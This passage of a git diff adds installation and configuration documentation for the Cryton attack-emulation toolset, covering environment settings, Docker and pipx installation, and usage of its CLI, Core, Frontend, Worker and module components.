This is done via asynchronous +communication between our Worker component and an Empire c2 server. + +### Docker (compose) +To bundle everything together and make the deployment effortless, we use Docker or Docker Compose configurations. diff --git a/docs/components/cli.md b/docs/components/cli.md new file mode 100644 index 0000000000000000000000000000000000000000..41a843795627b5be70a91b7837f5c51866f7f933 --- /dev/null +++ b/docs/components/cli.md @@ -0,0 +1,286 @@ +## Description +Cryton CLI is a command line interface used to interact with [Cryton Core](core.md) (its API). + +[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-cli){target="_blank"}. + +## Settings +Cryton CLI uses environment variables for its settings. Please update them to your needs. + +### Overriding settings +To override the settings, use the `export` command: +```shell +export CRYTON_CLI_API_HOST=127.0.0.1 +``` + +!!! note "" + + Use `unset` to remove a variable. + +!!! tip "" + + Some settings can be overridden using the CLI. Try using: + ``` + cryton-cli --help + ``` + +??? tip "Overriding settings permanently" + + <div id="settings-permanent"></div> + + First, make sure the app directory exists: + ```shell + mkdir -p ~/.local/cryton-cli/ + ``` + + Download the default settings into the app directory: + + === "curl" + + ```shell + curl -o ~/.local/cryton-cli/.env https://gitlab.ics.muni.cz/cryton/cryton-cli/-/raw/{{{ git_release }}}/.env + ``` + + === "wget" + + ```shell + wget -O ~/.local/cryton-cli/.env https://gitlab.ics.muni.cz/cryton/cryton-cli/-/raw/{{{ git_release }}}/.env + ``` + + Open the file and update it to your needs. + +??? tip "Overriding settings with Docker" + + <div id="settings-docker"></div> + + To override a variable use the `-e` or the `--env-file` option: + ``` + docker run -e CRYTON_CLI_API_HOST=127.0.0.1 --env-file relative/path/to/.env ... 
+    ```
+
+    More information can be found [here](https://docs.docker.com/engine/reference/commandline/run/#env){target="_blank"}.
+
+??? tip "Overriding settings with Docker compose"
+
+    <div id="settings-compose"></div>
+
+    Override variables in the `environment` or the `env_file` attribute:
+    ```
+    services:
+      service:
+        environment:
+          - CRYTON_CLI_API_HOST=127.0.0.1
+        env_file:
+          - relative/path/to/.env
+    ```
+
+    More information can be found [here](https://docs.docker.com/compose/environment-variables/set-environment-variables/#use-the-environment-attribute){target="_blank"}.
+
+### Available settings
+
+#### CRYTON_CLI_TIME_ZONE
+[Timezone](https://en.wikipedia.org/wiki/List_of_tz_database_time_zones){target="_blank"} used for scheduling (for example when
+scheduling a Run). Use the `AUTO` value to use your system timezone.
+
+| value  | default | example       |
+|--------|---------|---------------|
+| string | AUTO    | Europe/Prague |
+
+#### CRYTON_CLI_API_HOST
+Cryton Core's API address.
+
+| value  | default   | example          |
+|--------|-----------|------------------|
+| string | 127.0.0.1 | cryton-core.host |
+
+#### CRYTON_CLI_API_PORT
+Cryton Core's API port.
+
+| value | default | example |
+|-------|---------|---------|
+| int   | 8000    | 8008    |
+
+#### CRYTON_CLI_API_SSL
+Use SSL to connect to REST API.
+
+| value    | default | example |
+|----------|---------|---------|
+| boolean  | false   | true    |
+
+#### CRYTON_CLI_API_ROOT
+REST API URL. **(do not change, if you don't know what you're doing)**
+
+| value  | default | example   |
+|--------|---------|-----------|
+| string | api/    | api/path/ |
+
+#### CRYTON_CLI_APP_DIRECTORY
+Path to the Cryton CLI directory. **(do not change, if you don't know what you're doing)**
+
+| value  | default              | example       |
+|--------|----------------------|---------------|
+| string | ~/.local/cryton-cli/ | /path/to/app/ |
+
+!!! info ""
+
+    The default value in Docker is set to `/app`. 
+ +## Installation + +### With pipx +Cryton CLI is available in the [PyPI](https://pypi.org/project/cryton-cli/){target="_blank"} and can be installed using *pip*. +However, we **highly recommend** installing the app in an isolated environment using [pipx](https://pypa.github.io/pipx/){target="_blank"}. + +!!! danger "Requirements" + + - [Python](https://www.python.org/about/gettingstarted/){target="_blank"} >={{{ python.min }}},<{{{ python.max }}} + - [pipx](https://pypa.github.io/pipx/){target="_blank"} + +!!! tip "Recommendations" + + - Override the [settings](#settings) + - Enable [shell completion](#shell-completion) + +Install the app: + +=== "pipx" + + ```shell + pipx install cryton-cli + ``` + +=== "pip" + + ```shell + pip install --user cryton-cli + ``` + +### With Docker +Cryton CLI is available as a Docker image and can be installed using Docker. + +!!! danger "Requirements" + + - [Docker](https://docs.docker.com/engine/install/){target="_blank"} + +!!! tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - Override the [settings](#settings) + - If you're using persistent settings, switch to the [app directory](#cryton_cli_app_directory) and [pass the settings](#settings-docker) + +Run the container and enter an interactive shell: +```shell +docker run -it --network host registry.gitlab.ics.muni.cz:443/cryton/cryton-cli:{{{ release_version }}} +``` + +### With Docker Compose +Example Docker Compose configuration is also available. + +!!! danger "Requirements" + + - [Docker Compose](https://docs.docker.com/compose/install/){target="_blank"} + +!!! tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - Override the [settings](#settings) + - If you're using persistent settings, switch to the [app directory](#cryton_cli_app_directory) and [pass the settings](#settings-compose) + +??? 
tip "Switch to the app directory" + + ```shell + mkdir -p ~/.local/cryton-cli/ + cd ~/.local/cryton-cli/ + ``` + +Download the configuration using: + +=== "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-cli/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +=== "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-cli/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +Run the container and enter an interactive shell: +``` +docker compose run cryton_cli +``` + +## Usage +Use the following to invoke the app: +```shell +cryton-cli +``` + +You should see a help page: +``` +Usage: cryton-cli [OPTIONS] COMMAND [ARGS]... + + A CLI wrapper for Cryton API. + +Options: + ... +``` + +To learn about each command's options use: +```shell +cryton-cli <your command> --help +``` + +??? question "How to change the default API host/port?" + + To change the default API host/port use *-H* and *-p* options. + ```shell + cryton-cli -H 127.0.0.1 -p 8000 <your command> + ``` + +## Shell completion +Shell completion is available for the *Bash*, *Zsh*, and *Fish* shell and has to be manually enabled. + +!!! info "" + + - To enable the shell completion, the tool must be present + - The shell completion is enabled in Docker by default + +First, make sure the app directory exists: + +=== "Bash" + + ```shell + mkdir -p ~/.local/cryton-cli/ + ``` + +=== "Zsh" + + ```shell + mkdir -p ~/.local/cryton-cli/ + ``` + +Generate, save, and load the completion script: + +=== "Bash" + + ```shell + _CRYTON_CLI_COMPLETE=bash_source cryton-cli > ~/.local/cryton-cli/cryton-cli-complete.bash + echo ". ~/.local/cryton-cli/cryton-cli-complete.bash" >> ~/.bashrc + ``` + +=== "Zsh" + + ```shell + _CRYTON_CLI_COMPLETE=zsh_source cryton-cli > ~/.local/cryton-cli/cryton-cli-complete.zsh + echo ". 
~/.local/cryton-cli/cryton-cli-complete.zsh" >> ~/.zshrc + ``` + +=== "Fish" + + ```shell + _CRYTON_CLI_COMPLETE=fish_source cryton-cli > ~/.config/fish/completions/cryton-cli-complete.fish + ``` + +You may need to restart your shell for the changes to take effect. diff --git a/docs/components/core.md b/docs/components/core.md new file mode 100644 index 0000000000000000000000000000000000000000..98242ec13f9dbc0be7e964c749dc8794af1f21c8 --- /dev/null +++ b/docs/components/core.md @@ -0,0 +1,463 @@ +## Description +Cryton Core is the center point of the Cryton toolset. It is used for: + +- Creating, planning, and scheduling attack scenarios +- Generating reports +- Controlling Workers and scenarios execution + +[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-core){target="_blank"}. + +## Settings +Cryton Core uses environment variables for its settings. Please update them to your needs. + +### Overriding settings +To override the settings, use the `export` command: +```shell +export CRYTON_CORE_RABBIT_USERNAME=cryton +``` + +!!! note "" + + Use `unset` to remove a variable. + +!!! tip "" + + Some settings can be overridden using the CLI. Try using: + ``` + cryton-core help <your command> + ``` + +??? tip "Overriding settings permanently" + + <div id="settings-permanent"></div> + + First, make sure the [app directory](#cryton_core_app_directory) exists: + ```shell + mkdir -p ~/.local/cryton-core/ + ``` + + Download the default settings into the app directory: + + === "curl" + + ```shell + curl -o ~/.local/cryton-core/.env https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/.env + ``` + + === "wget" + + ```shell + wget -O ~/.local/cryton-core/.env https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/.env + ``` + + Open the file and update it to your needs. + +??? 
tip "Overriding settings with Docker"
+
+    <div id="settings-docker"></div>
+
+    To override a variable use the `-e` or the `--env-file` option:
+    ```
+    docker run -e CRYTON_CORE_RABBIT_USERNAME=cryton --env-file relative/path/to/.env ...
+    ```
+
+    More information can be found [here](https://docs.docker.com/engine/reference/commandline/run/#env){target="_blank"}.
+
+??? tip "Overriding settings with Docker compose"
+
+    <div id="settings-compose"></div>
+
+    Override variables in the `environment` or the `env_file` attribute:
+    ```
+    services:
+      service:
+        environment:
+          - CRYTON_CORE_RABBIT_USERNAME=cryton
+        env_file:
+          - relative/path/to/.env
+    ```
+
+    More information can be found [here](https://docs.docker.com/compose/environment-variables/set-environment-variables/#use-the-environment-attribute){target="_blank"}.
+
+### Available settings
+
+#### CRYTON_CORE_RABBIT_HOST
+RabbitMQ server host.
+
+| value  | default   | example       |
+|--------|-----------|---------------|
+| string | 127.0.0.1 | cryton-rabbit |
+
+#### CRYTON_CORE_RABBIT_PORT
+RabbitMQ server port.
+
+| value | default | example |
+|-------|---------|---------|
+| int   | 5672    | 15672   |
+
+#### CRYTON_CORE_RABBIT_USERNAME
+Username for RabbitMQ server login.
+
+| value  | default | example |
+|--------|---------|---------|
+| string | cryton  | admin   |
+
+#### CRYTON_CORE_RABBIT_PASSWORD
+Password for RabbitMQ server login.
+
+| value  | default | example |
+|--------|---------|---------|
+| string | cryton  | mypass  |
+
+#### CRYTON_CORE_DB_HOST
+Postgres server host.
+
+| value  | default   | example          |
+|--------|-----------|------------------|
+| string | 127.0.0.1 | cryton-pgbouncer |
+
+#### CRYTON_CORE_DB_PORT
+Postgres server port.
+
+| value | default | example |
+|-------|---------|---------|
+| int   | 5432    | 15432   |
+
+#### CRYTON_CORE_DB_NAME
+Used Postgres database name. 
**(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|---------|-----------| +| string | cryton | cryton_db | + +#### CRYTON_CORE_DB_USERNAME +Username for Postgres server login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | user | + +#### CRYTON_CORE_DB_PASSWORD +Password for Postgres server login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | passwd | + +#### CRYTON_CORE_Q_ATTACK_RESPONSE +Queue name for processing attack responses. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|-----------------------------|--------------------------------| +| string | cryton_core.attack.response | cryton_core.attack.response.id | + +#### CRYTON_CORE_Q_AGENT_RESPONSE +Queue name for processing agent responses. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|----------------------------|-------------------------------| +| string | cryton_core.agent.response | cryton_core.agent.response.id | + +#### CRYTON_CORE_Q_EVENT_RESPONSE +Queue name for processing event responses. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|----------------------------|-------------------------------| +| string | cryton_core.event.response | cryton_core.event.response.id | + +#### CRYTON_CORE_Q_CONTROL_REQUEST +Queue name for processing control requests. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|-----------------------------|--------------------------------| +| string | cryton_core.control.request | cryton_core.control.request.id | + +#### CRYTON_CORE_DEBUG +Make Core run with debug output. 
+ +| value | default | example | +|---------|---------|---------| +| boolean | false | true | + +#### CRYTON_CORE_DEFAULT_RPC_TIMEOUT +Timeout (in seconds) for RabbitMQ RPC requests. + +| value | default | example | +|-------|---------|---------| +| int | 120 | 200 | + +#### CRYTON_CORE_API_SECRET_KEY +Key (64 chars) used by REST API for cryptographic signing. +More information can be found [here](https://docs.djangoproject.com/en/4.1/ref/settings/#secret-key){target="_blank"}. + +| value | default | example | +|--------|---------|----------------------| +| string | cryton | XF37..56 chars..6HB3 | + +#### CRYTON_CORE_API_ALLOWED_HOSTS +Domain names that the site can serve. **(do not change, if you don't know what you're doing)** +More information can be found [here](https://docs.djangoproject.com/en/4.1/ref/settings/#allowed-hosts){target="_blank"}. + +| value | default | example | +|------------------------------------|---------|------------| +| list of strings separated by space | * | host host2 | + +#### CRYTON_CORE_API_STATIC_ROOT +Directory for storing static files. **(do not change, if you don't know what you're doing)** +More information can be found [here](https://docs.djangoproject.com/en/4.0/ref/settings/#static-root){target="_blank"}. + +| value | default | example | +|--------|--------------------------------|------------------------------| +| string | /usr/local/apache2/web/static/ | /var/www/example.com/static/ | + +#### CRYTON_CORE_API_USE_STATIC_FILES +Whether to serve static files or not. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|---------|---------|---------| +| boolean | false | true | + +#### CRYTON_CORE_CPU_CORES +The maximum number of CPU cores (processes) Cryton Core can utilize. **(do not change, if you don't know what you're doing)** +This affects the speed of starting/consuming Steps/Rabbit requests. Set the value to `auto` for the best CPU utilization. 
+ +| value | default | example | +|-------|---------|---------| +| int | 3 | 2 | + +#### CRYTON_CORE_EXECUTION_THREADS_PER_PROCESS +How some payloads or Rabbit's channel consumers should be distributed. **(do not change, if you don't know what you're doing)** +This affects the speed of starting/consuming Steps/Rabbit requests. + +| value | default | example | +|-------|---------|---------| +| int | 7 | 5 | + +#### CRYTON_CORE_APP_DIRECTORY +Path to the Cryton Core directory. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|-----------------------|---------------| +| string | ~/.local/cryton-core/ | /path/to/app/ | + +!!! info "" + + The default value in Docker is set to `/app`. + +## Prerequisites +Cryton Core requires the following technologies to run properly: + +- [PostgreSQL database](https://www.postgresql.org/download/){target="_blank"} +- [RabbitMQ server](https://www.rabbitmq.com/download.html){target="_blank"} +- [PgBouncer](https://www.pgbouncer.org/install.html){target="_blank"} + +To make the installation process smoother the prerequisites are bundled within the [Docker Compose](#with-docker-compose) installation. + +??? question "Want to use pipx or Docker, but don't want to install and set up the prerequisites on your own?" + + !!! danger "Requirements" + + - [Docker Compose](https://docs.docker.com/compose/install/){target="_blank"} + + !!! tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + + First, you have to create [permanent settings](#settings-permanent). 
Then, switch to the app directory: + ```shell + cd ~/.local/cryton-core/ + ``` + + Download the Compose configuration: + + === "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/docker-compose.prerequisites.yml + ``` + + === "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/docker-compose.prerequisites.yml + ``` + + Run the Compose configuration: + ``` + docker compose -f docker-compose.prerequisites.yml up -d + ``` + +## Installation + +### With Docker Compose +The easiest way to install Cryton Core (and its prerequisites) is to use the example Docker Compose configuration. + +!!! danger "Requirements" + + - [Docker Compose](https://docs.docker.com/compose/install/){target="_blank"} + - Create [permanent settings](#settings-permanent) + - Update the following settings: + 1. CRYTON_CORE_RABBIT_HOST=cryton-rabbit + 2. CRYTON_CORE_DB_HOST=cryton-pgbouncer + 3. CRYTON_CORE_API_USE_STATIC_FILES=true + +!!! tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - Override the [settings](#settings) + +First, switch to the app directory: +```shell +cd ~/.local/cryton-core/ +``` + +Download the Compose configuration: + +=== "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +=== "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +Run the Compose configuration: +``` +docker compose up -d +``` + +??? question "What should the output look like?" 
+ + ``` + [+] Running 6/6 + ⠿ Network cryton-core_default Created + ⠿ Container cryton-rabbit Healthy + ⠿ Container cryton-db Healthy + ⠿ Container cryton-pgbouncer Healthy + ⠿ Container cryton-core Started + ⠿ Container cryton-proxy Started + ``` + +Check if the installation was successful and the app is running with curl: +``` +curl localhost:8000/api/ +``` + +??? question "What should the output look like?" + + ``` + {"runs":"http://localhost:8000/cryton/api/v1/runs/","plans":"http://localhost:8000/cryton/api/v1/plans/", + "plan_executions":"http://localhost:8000/cryton/api/v1/plan_executions/","stages":"http://localhost:8000/cryton/api/v1/stages/", + "stage_executions":"http://localhost:8000/cryton/api/v1/stage_executions/","steps":"http://localhost:8000/cryton/api/v1/steps/", + "step_executions":"http://localhost:8000/cryton/api/v1/step_executions/","workers":"http://localhost:8000/cryton/api/v1/workers/"} + ``` + +### With pipx +Cryton Core is available in the [PyPI](https://pypi.org/project/cryton-core/) and can be installed using *pip*. +However, we **highly recommend** installing the app in an isolated environment using [pipx](https://pypa.github.io/pipx/). + +!!! danger "Requirements" + + - [Python](https://www.python.org/about/gettingstarted/){target="_blank"} >={{{ python.min }}},<{{{ python.max }}} + - [pipx](https://pypa.github.io/pipx/){target="_blank"} + +!!! tip "Recommendations" + + - Override the [settings](#settings) + +Install the app: + +=== "pipx" + + ```shell + pipx install cryton-core + ``` + +=== "pip" + + ```shell + pip install --user cryton-core + ``` + +### With Docker +Cryton Core is available as a Docker image and can be installed using Docker. + +!!! danger "Requirements" + + - [Docker](https://docs.docker.com/engine/install/){target="_blank"} + +!!! 
tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - Override the [settings](#settings) + - If you're using persistent settings, switch to the [app directory](#cryton_core_app_directory) and [pass the settings](#settings-docker) + +Run the container: +```shell +docker run -d registry.gitlab.ics.muni.cz:443/cryton/cryton-core:{{{ release_version }}} +``` + +!!! warning "Limitations" + + The easiest way to make the container accessible from the outside and to allow the container to access the prerequisites is to use the `--network host` option: + ```shell + docker run --network host -d registry.gitlab.ics.muni.cz:443/cryton/cryton-core:{{{ release_version }}} + ``` + +## Usage + +!!! info "" + + If you're using Docker (Compose) to install the app, you don't need to migrate the database or start the services mentioned in this section. + +Use the following to invoke the app: +```shell +cryton-core +``` + +You should see a help page: +``` +Type 'cryton-core help <subcommand>' for help on a specific subcommand. + +Available subcommands: +... +``` + +To learn about each command's options use: +```shell +cryton-core help <your command> +``` + +Before we do anything, **we need to migrate the database**: +```shell +cryton-core migrate +``` + +To be able to use Cryton Core, we need to start the REST API and RabbitMQ listener. We can do both using: +```shell +cryton-core start +``` + +??? question "How to change the default API host/port?" + + To change the default API host/port use the *--bind* option. + ```shell + cryton-core start --bind <address>:<port> + ``` + +### REST API and control +REST API is the only way to communicate with Cryton Core. It is by default running at +[http://0.0.0.0:8000](http://0.0.0.0:8000){target="_blank"}. Interactive documentation can be found at +[http://0.0.0.0:8000/doc](http://0.0.0.0:8000/doc){target="_blank"}. 
+ +To be able to control Cryton Core, you have to send requests to its REST API. This can be done manually, or via [Cryton CLI](cli.md) or [Cryton Frontend](frontend.md). + +## Troubleshooting + +???+ question "Unable to load the interactive REST API?" + + If you're not using a reverse proxy, set `CRYTON_CORE_API_USE_STATIC_FILES=false`. diff --git a/docs/components/frontend.md b/docs/components/frontend.md new file mode 100644 index 0000000000000000000000000000000000000000..26ddfd28766c565e0eb72a0f20b1fc1617d2811d --- /dev/null +++ b/docs/components/frontend.md @@ -0,0 +1,170 @@ +## Description +Cryton Frontend is a graphical interface used to interact with [Cryton Core](core.md) (its API). + +[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-frontend){target="_blank"}. + +## Settings +Cryton Frontend uses environment variables for its settings. Please update them to your needs. + +!!! warning "Notice" + + For now, settings can be changed only for the [npm installation](#with-npm). + However, it is possible to update the API host and port at runtime at + [http://localhost:8080/app/user/settings](http://localhost:8080/app/user/settings){target="_blank"}. + +Variables can be found in `src/environments/`. For production modify the _environment.prod.ts_ file, else modify the _environment.ts_ file. + +#### crytonRESTApiHost +Cryton Core's API address. + +| value | default | example | +|--------|-----------|------------------| +| string | 127.0.0.1 | cryton-core.host | + +#### crytonRESTApiPort +Cryton Core's API port. + +| value | default | example | +|-------|---------|---------| +| int | 8000 | 8008 | + +#### refreshDelay +Sets artificial delay in milliseconds for refresh API requests. + +??? question "What is this for?" + + Users usually react better if the requests don't happen instantly, but they can see a tiny bit of loading. 
+ Initial API request doesn't use delay, this is only for refreshing data + +| value | default | example | +|-------|---------|---------| +| int | 300 | 500 | + +#### useHttps +Use SSL to connect to REST API. + +| value | default | example | +|---------|---------|---------| +| boolean | false | true | + +## Installation + +### With Docker +Cryton Frontend is available as a Docker image and can be installed using Docker. + +!!! danger "Requirements" + + - [Docker](https://docs.docker.com/engine/install/){target="_blank"} + +!!! tip "Recommendations" + + - [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + +[//]: # ( - Override the [settings](#settings)) + +Run the front end in the background: +```shell +docker run -d -p 127.0.0.1:8080:80 registry.gitlab.ics.muni.cz:443/cryton/cryton-frontend:{{{ release_version }}} +``` + +### With Docker Compose +Example Docker Compose configuration is also available. + +!!! danger "Requirements" + + - [Docker Compose](https://docs.docker.com/compose/install/){target="_blank"} + +!!! tip "Recommendations" + + - [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + +[//]: # ( - Override the [settings](#settings)) + +??? tip "Create a new directory" + + ```shell + mkdir cryton-frontend + cd cryton-frontend + ``` + +Download the configuration using: + +=== "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-frontend/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +=== "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-frontend/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +Run the Compose configuration: +``` +docker compose up -d +``` + +### With npm +Even though the front end can be installed using npm, it is **not recommended**. + +!!! danger "Requirements" + + - [npm](https://nodejs.org/en/){target="_blank"} + +!!! 
tip "Recommendations" + + - Override the [settings](#settings) + +Clone the repository: +```shell +git clone https://gitlab.ics.muni.cz/cryton/cryton-frontend.git +cd cryton-frontend +``` + +Install the dependencies: +```shell +npm install +``` + +Serve the app: +=== "Testing" + + ```shell + ng serve --port 8080 + ``` + +=== "Production" + + ```shell + ng serve --prod --port 8080 + ``` + +!!! warning "" + + Use `ng serve` only for development/testing. In a real production environment use either Docker (compose) installation or a + production build deployed on a production-ready web server (for example Nginx). + +??? info "Build the app" + + You can find the build in the **/dist** folder. + + === "Testing" + + ```shell + npm run build + ``` + + === "Production" + + ```shell + npm run build-prod + ``` + +## Usage +By default, the Frontend is served at [http://localhost:8080/](http://localhost:8080/){target="_blank"}. + +Use the in-app help pages to learn about usage. + +[//]: # (TODO: make a video) diff --git a/docs/components/modules.md b/docs/components/modules.md new file mode 100644 index 0000000000000000000000000000000000000000..5a907ad128d51e550eec1f4bfe1c18b089dfe34d --- /dev/null +++ b/docs/components/modules.md @@ -0,0 +1,63 @@ +## Description +Cryton (attack) modules are a collection of Python scripts with the goal of orchestrating known offensive security tools +(Nmap, Metasploit, medusa, etc.). Although this is their intended purpose, they are still Python scripts, and therefore +any custom-made script can be used similarly. + +!!! note "" + + Do not forget that the modules can be used for other purposes other than attacking. + +[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-modules){target="_blank"}. + +## Installation +Modules are automatically installed on [Worker](worker.md)'s start-up, you just need to download and **move them to the [Worker's app directory](worker.md#cryton_worker_app_directory)**. + +!!! 
warning ""
+
+    The system requirements for each module have to be **installed manually** as specified in each module's README [here](#available-modules).
+
+    However, if you're using [Worker's Kali image](worker.md#with-docker) the requirements are already satisfied for the official modules.
+    If the Worker is deployed on a fully-fledged Kali OS, you **SHOULD NOT** need to install the system requirements either. Nevertheless, you should check whether they're satisfied.
+
+### With git
+!!! danger "Requirements"
+
+    - [Git](https://git-scm.com/){target="_blank"}
+
+Clone the repository and check out the correct version:
+```shell
+git clone https://gitlab.ics.muni.cz/cryton/cryton-modules.git
+cd cryton-modules
+git checkout {{{ git_release }}}
+```
+
+Make sure the Worker's app directory exists and copy the modules into it:
+```shell
+mkdir -p ~/.local/cryton-worker/
+cp -r modules ~/.local/cryton-worker/
+```
+
+### Manually
+Go to the [repository](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/tree/{{{ git_release }}}){target="_blank"} and download it:
+
+
+
+Finally, extract the `modules` directory from the archive to Worker's app directory (`~/.local/cryton-worker/`).
+
+## Usage
+Modules are primarily targeted for use with [Cryton Worker](worker.md).
+Once the Worker receives an execution request, it imports a module, runs it with the supplied arguments, and saves its output.
+
+Even though the modules are Python scripts and can be installed and executed manually, some of them use the Worker's
+[prebuilt functionality](../development/modules.md#prebuilt-functionality), which means you have to run them
+in the same virtual environment as Cryton Worker.
+
+## Available modules
+Here is a curated list of modules. Please see each module's readme for more information. 
+ +- [mod_cmd](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/blob/master/modules/mod_cmd/README.md){target="_blank"} +- [mod_script](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/blob/master/modules/mod_script/README.md){target="_blank"} +- [mod_medusa](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/blob/master/modules/mod_medusa/README.md){target="_blank"} +- [mod_msf](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/blob/master/modules/mod_msf/README.md){target="_blank"} +- [mod_nmap](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/blob/master/modules/mod_nmap/README.md){target="_blank"} +- [mod_wpscan](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/blob/master/modules/mod_wpscan/README.md){target="_blank"} diff --git a/docs/components/worker.md b/docs/components/worker.md new file mode 100644 index 0000000000000000000000000000000000000000..b0392d76b3fe644aae041b8baf43f4c50d553038 --- /dev/null +++ b/docs/components/worker.md @@ -0,0 +1,479 @@ +## Description +Cryton Worker is used for executing [attack modules](modules.md) remotely. It consumes messages from [Cryton Core](core.md) through the +[RabbitMQ](https://www.rabbitmq.com/){target="_blank"}. + +[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-worker){target="_blank"}. + +## Settings +Cryton Worker uses environment variables for its settings. Please update them to your needs. + +### Overriding settings +To override the settings, use the `export` command: +```shell +export CRYTON_WORKER_NAME=name +``` + +!!! note "" + + Use `unset` to remove a variable. + +!!! tip "" + + Some settings can be overridden using the CLI. Try using: + ``` + cryton-worker start --help + ``` + +??? 
tip "Overriding settings permanently"
+
+    <div id="settings-permanent"></div>
+
+    First, make sure the app directory exists:
+    ```shell
+    mkdir -p ~/.local/cryton-worker/
+    ```
+
+    Download the default settings into the app directory:
+
+    === "curl"
+
+        ```shell
+        curl -o ~/.local/cryton-worker/.env https://gitlab.ics.muni.cz/cryton/cryton-worker/-/raw/{{{ git_release }}}/.env
+        ```
+
+    === "wget"
+
+        ```shell
+        wget -O ~/.local/cryton-worker/.env https://gitlab.ics.muni.cz/cryton/cryton-worker/-/raw/{{{ git_release }}}/.env
+        ```
+
+    Open the file and update it to your needs.
+
+??? tip "Overriding settings with Docker"
+
+    <div id="settings-docker"></div>
+
+    To override a variable use the `-e` or the `--env-file` option:
+    ```
+    docker run -e CRYTON_WORKER_NAME=name --env-file relative/path/to/.env ...
+    ```
+
+    More information can be found [here](https://docs.docker.com/engine/reference/commandline/run/#env){target="_blank"}.
+
+??? tip "Overriding settings with Docker Compose"
+
+    <div id="settings-compose"></div>
+
+    Override variables in the `environment` or the `env_file` attribute:
+    ```
+    services:
+      service:
+        environment:
+          - CRYTON_WORKER_NAME=name
+        env_file:
+          - relative/path/to/.env
+    ```
+
+    More information can be found [here](https://docs.docker.com/compose/environment-variables/set-environment-variables/#use-the-environment-attribute){target="_blank"}.
+
+### Available settings
+
+#### CRYTON_WORKER_NAME
+Unique name used to identify the Worker.
+
+| value  | default | example   |
+|--------|---------|-----------|
+| string | worker  | my_worker |
+
+#### CRYTON_WORKER_MODULES_DIR
+Path to the directory containing the modules.
+
+| value  | default                          | example                      |
+|--------|----------------------------------|------------------------------|
+| string | /path/to/cryton-modules/modules/ | /opt/cryton-modules/modules/ |
+
+#### CRYTON_WORKER_DEBUG
+Make Worker run in debug mode. 
+ +| value | default | example | +|---------|---------|---------| +| boolean | false | true | + +#### CRYTON_WORKER_INSTALL_REQUIREMENTS +Install requirements.txt for each module on startup. + +| value | default | example | +|---------|---------|---------| +| boolean | true | false | + +#### CRYTON_WORKER_CONSUMER_COUNT +The number of consumers used for Rabbit communication (more equals faster request processing and heavier processor usage). + +| value | default | example | +|-------|---------|---------| +| int | 7 | 3 | + +#### CRYTON_WORKER_PROCESSOR_COUNT +The number of processors used for internal requests (more equals faster internal requests processing, but heavier processor usage). + +| value | default | example | +|-------|---------|---------| +| int | 7 | 3 | + +#### CRYTON_WORKER_MAX_RETRIES +How many times to try to re-connect to RabbitMQ when the connection is lost. + +| value | default | example | +|-------|---------|---------| +| int | 3 | 5 | + +#### CRYTON_WORKER_MSFRPCD_HOST +Metasploit Framework RPC host. + +| value | default | example | +|-------|-----------|-------------| +| str | 127.0.0.1 | msfrpc.host | + +#### CRYTON_WORKER_MSFRPCD_PORT +Metasploit Framework RPC port. + +| value | default | example | +|-------|---------|---------| +| int | 55553 | 55554 | + +#### CRYTON_WORKER_MSFRPCD_SSL +Use SSL to connect to Metasploit Framework RPC. + +| value | default | example | +|---------|---------|---------| +| boolean | true | false | + +#### CRYTON_WORKER_MSFRPCD_USERNAME +Username for Metasploit Framework RPC login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | msf | + +#### CRYTON_WORKER_MSFRPCD_PASSWORD +Password for Metasploit Framework RPC login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | toor | + +#### CRYTON_WORKER_RABBIT_HOST +RabbitMQ server host. 
